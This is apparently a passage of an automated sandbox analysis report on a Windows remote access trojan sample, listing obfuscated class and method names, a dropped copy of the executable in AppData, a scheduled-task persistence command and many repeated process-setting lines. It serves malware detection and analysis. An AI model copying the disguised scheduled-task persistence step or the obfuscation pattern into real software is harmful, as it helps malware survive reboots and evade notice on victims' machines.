                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, Pc5EbqW7of4KtsoFdbm.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NoH8wIUguG', 'z1e8dajAAa', 'Obh8cBPX6Y', 'o0W8YxhQ2K', 'p0M8FlvC35', 'F1k8t8QTfI', 'RHG8BnG5lg'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, qPR26bWP9YqtF728xSp.cs High entropy of concatenated method names: 'rG5vh3TwnH', 'JMZv00OnlN', 'IhcvuAp9uB', 'IUmvnj8rYN', 'yO3viJ2jZr', 's7avI5fHjc', 'wu3vGubmmw', 'yffvgg3opd', 'RyxvyVMUVR', 'ITtvJ6ejkq'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, tc6CFuwhhqKghWoavi.cs High entropy of concatenated method names: 'TC64wchO6y', 'PSm4dLZtRE', 'tCh4c64gPb', 'oKU4YE6WmO', 'F7g4Fein1R', 'brc4tHW8Lh', 'MYS4ByTvYv', 'QoU4eZpQZ3', 'rAi4kEaZqd', 'HOl4xEOCIS'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4dcd5f8.4.raw.unpack, KpGIMg9jS35kOWayWB.cs High entropy of concatenated method names: 'iRavXJdJoL', 'j28vjYJ1on', 'cO5vo0QZkb', 'B09vVhU1fN', 'vlgv4Y1pix', 'KpGvUtP7Ip', 'bRkvQolkVR', 'RT53BmPGue', 's8w3eZfM1l', 'zSi3kXysor'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, Geok9UDGmJnESskYk6.cs High entropy of concatenated method names: 'nEAuD0lDn', 'k6knAiJLk', 'NloI2QMWq', 'KfKGdF0FP', 'KDpyRwXgc', 'l5eJJqFdM', 'Ef5wrNDDaRAkXCrfUm', 'ygWAKiwbjKOGy9eQqM', 'RZ53xaKq7', 'Lj48UhUGh'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, DcHUM92j2w5Tv1Pf7E.cs High entropy of concatenated method names: 'fnKjroV6RR', 'o6TjVopft1', 'A7xj4l2Rcm', 'M2oj6QPVBi', 'qr1jUxRYoE', 'hs1jQnVh75', 'miJj7QKrPL', 'svIjlO0gMn', 'TqWj17sIZZ', 'jI2jqCjhhM'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, bieio6Q9YImFOfmWOy.cs High entropy of concatenated method names: 'Dispose', 'g5fXkaxBTb', 'n85MfiuDfO', 'Y0MKKFMbmB', 'Cw0Xxx2xPK', 'db1Xz8FYVX', 'ProcessDialogKey', 'LC3M2Sk8LB', 'FA6MX2cHyd', 'PMWMML8Uk9'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, ItnMZkLQR3l5sMrDFi.cs High entropy of concatenated method names: 'BNSSeIG0I3', 'LWsSxsmWTZ', 'QxR32nE91b', 'ODp3XZEqUS', 'wXISpl75aY', 'nESSmP5KSi', 'DMdS9D90ev', 'qt9SwiKkhJ', 'pSpSd5QdyB', 'eKRScXxLIg'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, ux2XFhK0MLC0DLZuGq.cs High entropy of concatenated method names: 'ToString', 'xifRpvoUtT', 'HqNRf5GyUA', 'zWsRDOyO3X', 'xnfRO1JkJw', 'muNRT7MmVO', 'TWwR5ui3bs', 'it3RsdXfZS', 'lKuRaGw3XJ', 'e5VRNmgRoA'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, FPXSFTjke38EUsFwMQ.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'HARMkwNTfr', 'sx2MxnZmMN', 'i3bMzVPvtO', 'ri7j2Lt4bc', 'gqUjXW55to', 'hcAjMibAaD', 'IHijjudiKN', 'xIrfD5giXHZVB1KKgWh'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, bIslAo5xLyfYTdWbDU.cs High entropy of concatenated method names: 'DPl3PkK2h7', 'IWt3fN2uIq', 'LXt3DGvDLf', 'ol43Oj0Eeb', 'R513w93ZMD', 'SPw3TlkZK6', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, FFL5rbCmJqMKZgE8Ip.cs High entropy of concatenated method names: 'Qg9Qr8M1aB', 'jBtQ4y5U8S', 'yyIQUAXgLV', 'BTlQ7ZNm8J', 'eQsQlPSiK6', 'JHsUF6o9hO', 'VTlUtXKxve', 'OgLUBcjPaD', 'gYqUes9vBM', 'tp3UkUqHWu'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, lM8lcJnctlp2rWEnaI.cs High entropy of concatenated method names: 'hM63V4GChJ', 'Uw93410JmR', 'vGo36cdFBE', 'mS83UZ6rWu', 'gPJ3Qp4GKk', 'cwq37Bqjsw', 'lHQ3lQCN7r', 'k0q31Oc95C', 'piO3qePxMh', 'RV83AIUcqk'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, ajVBtPWDB3rCCiSSxWl.cs High entropy of concatenated method names: 'TvS8hsl079', 'BpC80PGBUq', 'hHi8upt9Tq', 'aFWeEvNK5eLYuKxZYuY', 'ipUWJANRjm73Mckjsbc', 'dl5qgJN3De1xmI04NgQ', 'yho2lTNVIfBMH3UHw9K'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, oho6rBSwnEYaeTlMlB.cs High entropy of concatenated method names: 'vxR7hQ9VS9', 'aXn70nv0lH', 'gDu7uEjRYq', 'piL7n98WSr', 'udI7i7hd9y', 'gQk7IMYbZi', 'fVQ7GXQv3c', 'x1Q7gmyfHx', 'ama7y12TMu', 'ToT7JT0Bns'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, J1eemHk4KmHXVbcVHe.cs High entropy of concatenated method names: 'PcWbgGdFBM', 'DgEbyqnfhj', 'sDxbPXFvBp', 'tl8bf0pds1', 'BNGbOn81il', 'IMObTmJJEI', 'eqQbs6wu2l', 'z4SbauVDSu', 'ra7bL7Na1k', 'IKjbpfbeAG'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, ohCSjHuOgcn8LMxW9w.cs High entropy of concatenated method names: 'wLEX7IhQ8w', 'L0SXl63BU3', 'J3CXqrtr0y', 'DfgXA2eSrf', 'R3TXCMeP42', 'oWhXRxxmcY', 'rrWcP43uvOFI7CVamN', 'PKSmfGVXc5QutPn4RS', 'JDkXXVFE8r', 'lfpXjDHdio'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, fEaTuDV8YOyfDce1Gr.cs High entropy of concatenated method names: 'lJs7VRZSi3', 'Pch76HnPE6', 'waL7QuYVud', 'Xe8QxrPnSy', 'SUjQzWLoNN', 'oOh7275Eic', 'LII7XdfUd5', 'OXG7MASNLV', 'o6L7j0oV8F', 'TMe7oj4S8y'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, eCybnUUGdbGwloyBj7.cs High entropy of concatenated method names: 'QcS6nNfy65', 'IZj6IpejFk', 'J3C6glZtoH', 'kRv6yxFKDR', 'Qud6CMvJOW', 'asl6RRwfej', 'n306S9Jh19', 'AsT63X21Ik', 'cVo6v9poYX', 'hhV68dyQr0'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, Pc5EbqW7of4KtsoFdbm.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NoH8wIUguG', 'z1e8dajAAa', 'Obh8cBPX6Y', 'o0W8YxhQ2K', 'p0M8FlvC35', 'F1k8t8QTfI', 'RHG8BnG5lg'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, qPR26bWP9YqtF728xSp.cs High entropy of concatenated method names: 'rG5vh3TwnH', 'JMZv00OnlN', 'IhcvuAp9uB', 'IUmvnj8rYN', 'yO3viJ2jZr', 's7avI5fHjc', 'wu3vGubmmw', 'yffvgg3opd', 'RyxvyVMUVR', 'ITtvJ6ejkq'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, tc6CFuwhhqKghWoavi.cs High entropy of concatenated method names: 'TC64wchO6y', 'PSm4dLZtRE', 'tCh4c64gPb', 'oKU4YE6WmO', 'F7g4Fein1R', 'brc4tHW8Lh', 'MYS4ByTvYv', 'QoU4eZpQZ3', 'rAi4kEaZqd', 'HOl4xEOCIS'
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.b9a0000.6.raw.unpack, KpGIMg9jS35kOWayWB.cs High entropy of concatenated method names: 'iRavXJdJoL', 'j28vjYJ1on', 'cO5vo0QZkb', 'B09vVhU1fN', 'vlgv4Y1pix', 'KpGvUtP7Ip', 'bRkvQolkVR', 'RT53BmPGue', 's8w3eZfM1l', 'zSi3kXysor'
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe File created: C:\Users\user\AppData\Roaming\zDAKFK.exe

                Boot Survival

                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp"

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
